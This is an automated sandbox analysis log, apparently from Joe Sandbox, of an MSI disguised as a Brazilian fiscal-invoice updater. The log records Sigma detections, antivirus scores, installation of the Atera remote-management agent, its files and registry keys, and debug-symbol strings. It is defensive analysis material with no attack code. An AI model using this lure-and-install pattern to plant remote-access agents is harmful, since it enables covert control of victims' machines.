Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 6D26F14034A16EC2E7A017FE2C233455 E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 6744, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 2640, ProcessName: net.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k smphost, CommandLine: C:\Windows\System32\svchost.exe -k smphost, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k smphost, ProcessId: 7456, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: 57a75b.rbf (copy)	ReversingLabs: Detection: 26%
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: Atualizador_Fiscal_NFe_37882912.msi

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.4% probability

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E94BC0 CryptAcquireContextW,GetLastError,CryptReleaseContext,CryptReleaseContext,CryptReleaseContext,	36_2_00007FFDF0E94BC0
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E94E20 CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptEncrypt,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,CryptDestroyHash,	36_2_00007FFDF0E94E20
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	Code function: 36_2_00007FFDF0E94DE0 CryptReleaseContext,	36_2_00007FFDF0E94DE0

Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks\AteraAgent	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe.config	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Directory created: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dll	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}

Jump to behavior

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Windows\system32\InstallUtil.InstallLog
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe	File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\TEMP\AteraSetupLog.txt

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe	File created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt

Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb# source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BE37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdbSHA256 source: AgentPackageMonitoring.exe, 00000024.00000002.2218327403.00000247F8A22000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BE37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdb6 source: rundll32.exe, 0000003D.00000002.2638010865.00000000030A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2635221045.00000000030A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb<$ source: AteraAgent.exe, 0000000C.00000000.1788379355.0000021679142000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: rundll32.exe, 0000003D.00000002.2638010865.00000000030D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000014.00000002.2037183161.0000028A55612000.00000002.00000001.01000000.00000018.sdmp, AgentPackageTicketing.exe, 00000031.00000002.2960467176.0000021F25452000.00000002.00000001.01000000.0000003E.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2960570710.0000011CB2862000.00000002.00000001.01000000.0000003F.sdmp, AgentPackageHeartbeat.exe, 00000039.00000002.2573605708.000002A3326A2000.00000002.00000001.01000000.00000035.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb# source: rundll32.exe, 0000003D.00000002.2641033184.0000000007300000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BE37000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002D.00000000.2421755187.0000019F9B462000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003D.00000003.2635221045.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638010865.00000000030DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdbp+ source: AgentPackageMonitoring.exe, 00000024.00000002.2218789671.00000247F8AE2000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbd source: AgentPackageUpgradeAgent.exe, 0000002D.00000000.2421755187.0000019F9B462000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdb source: AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbdeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdb source: AgentPackageMonitoring.exe, 00000024.00000002.2217047581.00000247F80E2000.00000002.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netstandard1.1\System.Memory.pdb source: AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb8 source: AgentPackageProgramManagement.exe, 00000036.00000002.2960570710.0000011CB2862000.00000002.00000001.01000000.0000003F.sdmp
Source:	Binary string: C:\Windows\AlphaControlAgentInstallation.pdbpdbion.pdb- source: rundll32.exe, 0000003D.00000002.2641033184.0000000007300000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HP7n\C:\Windows\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003D.00000002.2635872282.0000000000947000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: rundll32.exe, 00000003.00000003.1693514533.0000000004974000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000490A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.00000000049EB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000465E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \Windows\mscorlib.pdbpdblib.pdbEW source: AgentPackageSTRemote.exe, 00000021.00000002.3012686811.0000023072B30000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb source: AteraAgent.exe, 0000000C.00000000.1788379355.0000021679142000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: ent.pdb0Pva source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.pdbq source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: E:\A\_work\533\obj\Microsoft.ApplicationInsights\Release\src\Microsoft.ApplicationInsights\net45\Microsoft.ApplicationInsights.pdb source: Microsoft.ApplicationInsights.dll.14.dr
Source:	Binary string: D:\a\1\s\AgentPackageInternalPoller\AgentPackageInternalPoller\obj\Release\AgentPackageInternalPoller.pdb source: AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdbSHA256mW source: AteraAgent.exe, 0000000E.00000002.2403751991.000001A5726F2000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdb source: AteraAgent.exe, 0000000E.00000002.2403751991.000001A5726F2000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbVN'c source: rundll32.exe, 0000003D.00000002.2638010865.0000000003065000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2635221045.0000000003065000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdble3q source: rundll32.exe, 0000003D.00000003.2635221045.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638010865.00000000030DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA2567 source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2219808571.00000247F8C32000.00000002.00000001.01000000.00000024.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dows\dll\mscorlib.pdbB source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BE37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\code\dapper-dot-net\Dapper\bin\Release\net45\Dapper.pdb source: AgentPackageMonitoring.exe, 00000024.00000002.2218601445.00000247F8AA2000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: rundll32.exe, 0000003D.00000003.2635091236.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638518809.0000000003100000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2635687238.00000000030FF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageProgramManagement\AgentPackageProgramManagement\obj\Release\AgentPackageProgramManagement.pdb source: AgentPackageProgramManagement.exe, 00000036.00000000.2502915030.0000011CB23F2000.00000002.00000001.01000000.0000002B.sdmp
Source:	Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdbSHA256d source: AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageProgramManagement\ThirdPartyPackageManager\obj\Release\ThirdPartyPackageManager.pdb source: AgentPackageProgramManagement.exe, 00000036.00000002.2960100719.0000011CB2832000.00000002.00000001.01000000.0000003D.sdmp
Source:	Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdb source: AgentPackageMonitoring.exe, 00000024.00000002.2218327403.00000247F8A22000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.2004500560.0000028A55182000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: \??\C:\Windows\Installer\MSIF48E.tmp-\AlphaControlAgentInstallation.PDB source: rundll32.exe, 0000003D.00000002.2638010865.00000000030A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2635221045.00000000030A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000003.00000003.1693514533.0000000004974000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000490A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.00000000049EB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000465E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638010865.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdbh{ source: AteraAgent.exe, 00000018.00000002.2761360886.000002517A740000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2037318779.0000028A55B72000.00000002.00000001.01000000.00000019.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2455163364.0000028A32100000.00000002.00000001.01000000.00000029.sdmp
Source:	Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp
Source:	Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netstandard1.1\System.Memory.pdbSHA256~ source: AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2037318779.0000028A55B72000.00000002.00000001.01000000.00000019.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2219808571.00000247F8C32000.00000002.00000001.01000000.00000024.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2455163364.0000028A32100000.00000002.00000001.01000000.00000029.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2808350519.0000019FB46A2000.00000002.00000001.01000000.0000003B.sdmp, Microsoft.Win32.TaskScheduler.dll0.24.dr
Source:	Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdbTlnl `l_CorExeMainmscoree.dll source: AgentPackageTicketing.exe, 00000031.00000000.2473112434.0000021F24C42000.00000002.00000001.01000000.0000002A.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2808350519.0000019FB46A2000.00000002.00000001.01000000.0000003B.sdmp, Microsoft.Win32.TaskScheduler.dll0.24.dr
Source:	Binary string: D:\a\1\s\AgentPackageMonitoring\AgentPackageMonitoring\obj\Release\AgentPackageMonitoring.pdb source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BDE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\agent\_work\66\s\build\ship\x86\wixca.pdb source: Atualizador_Fiscal_NFe_37882912.msi
Source:	Binary string: PC:\Windows\AgentPackageUpgradeAgent.pdbP source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb4X source: AgentPackageHeartbeat.exe, 00000039.00000002.2573605708.000002A3326A2000.00000002.00000001.01000000.00000035.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageHeartbeat\AgentPackageHeartbeat\obj\Release\AgentPackageHeartbeat.pdb source: AgentPackageHeartbeat.exe, 00000039.00000000.2523509578.000002A332342000.00000002.00000001.01000000.0000002D.sdmp
Source:	Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp
Source:	Binary string: C:\buildAgent\work\1b72bc6dac87fa71\code_drop\merge\chocolatey.pdb source: AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp
Source:	Binary string: dows\dll\System.pdb source: rundll32.exe, 0000003D.00000002.2641033184.0000000007300000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbP source: rundll32.exe, 00000003.00000003.1693514533.0000000004974000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000490A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.00000000049EB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000465E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdbSHA256`{f source: AgentPackageMonitoring.exe, 00000024.00000002.2217047581.00000247F80E2000.00000002.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbPf source: AgentPackageAgentInformation.exe, 00000014.00000002.2037183161.0000028A55612000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003D.00000002.2638010865.00000000030A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2635221045.00000000030A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\AgentPackageUpgradeAgent.pdbpdbent.pdb8 source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BE37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: rundll32.exe, 0000003D.00000002.2638010865.00000000030D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\AlphaControlAgentInstallation.pdbo@ca# source: rundll32.exe, 0000003D.00000002.2638415815.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2635091236.00000000030F7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: pC:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: rolAgentInstallation.pdbn source: rundll32.exe, 0000003D.00000003.2635036820.0000000007358000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\A\_work\533\obj\Microsoft.ApplicationInsights\Release\src\Microsoft.ApplicationInsights\net45\Microsoft.ApplicationInsights.pdbCW source: Microsoft.ApplicationInsights.dll.14.dr
Source:	Binary string: mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BDE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\bin\2012\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: AgentPackageMonitoring.exe, 00000024.00000002.2231925001.00007FFDF0FDA000.00000002.00000001.01000000.0000001C.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2407710200.00007FFDF118C000.00000002.00000001.01000000.0000001C.sdmp, SQLite.Interop.dll.14.dr
Source:	Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000C.00000002.1848197535.000002167B6F2000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000C.00000002.1848197535.000002167B6F2000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netstandard1.1\System.Memory.pdb source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100727000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdb source: AgentPackageMonitoring.exe, 00000024.00000002.2218789671.00000247F8AE2000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageTicketing\TicketingPackageExtensions\obj\Release\TicketingPackageExtensions.pdb source: AgentPackageTicketing.exe, 00000031.00000002.2959271020.0000021F24FC2000.00000002.00000001.01000000.0000003C.sdmp
Source:	Binary string: C:\agent\_work\66\s\build\ship\x86\SfxCA.pdb source: Atualizador_Fiscal_NFe_37882912.msi
